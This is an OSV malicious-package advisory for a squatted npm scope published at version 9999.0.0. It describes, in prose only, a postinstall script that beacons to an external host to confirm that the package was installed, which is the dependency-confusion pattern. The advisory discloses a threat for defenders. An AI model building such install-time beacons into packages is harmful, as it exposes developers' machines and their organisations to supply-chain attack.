@businessapp-microsites/apis @9999.0.1
Vulnerability report · Last retrieved from osv.dev June 30, 2026 at 11:01 PM UTC
OSV ID
MAL-2026-6696
Ecosystem
npm
Summary
Package squats the @businessapp-microsites npm scope and is published at version 9999.0.0 to outrank any internal version during dependency resolution. The package.json declares a postinstall script that runs node -e to issue an HTTPS GET to poc-trustpilot-npm-1782770591.testingboxes.com with a unique per-package token in the URL path. On any npm install that resolves this scope from the public registry, the installer's machine performs an outbound callback that confirms execution and discloses the installer's source IP and the fact-of-install to a third-party host. The combination of an unregistered-scope squat, the 9999.0.0 version pin, and an install-time beacon to an external host is the canonical dependency-confusion attack pattern; researcher framing in the package metadata does not change the runtime behavior on any machine that installs it.
Source: amazon-inspector (8e03d8a4119cd5d1c143adb4fcdab1625747178082a6d56717e758b513aec4f7)
Protect your entire dependency tree
Scan your lock files automatically on every PR. Block malicious packages before they reach production.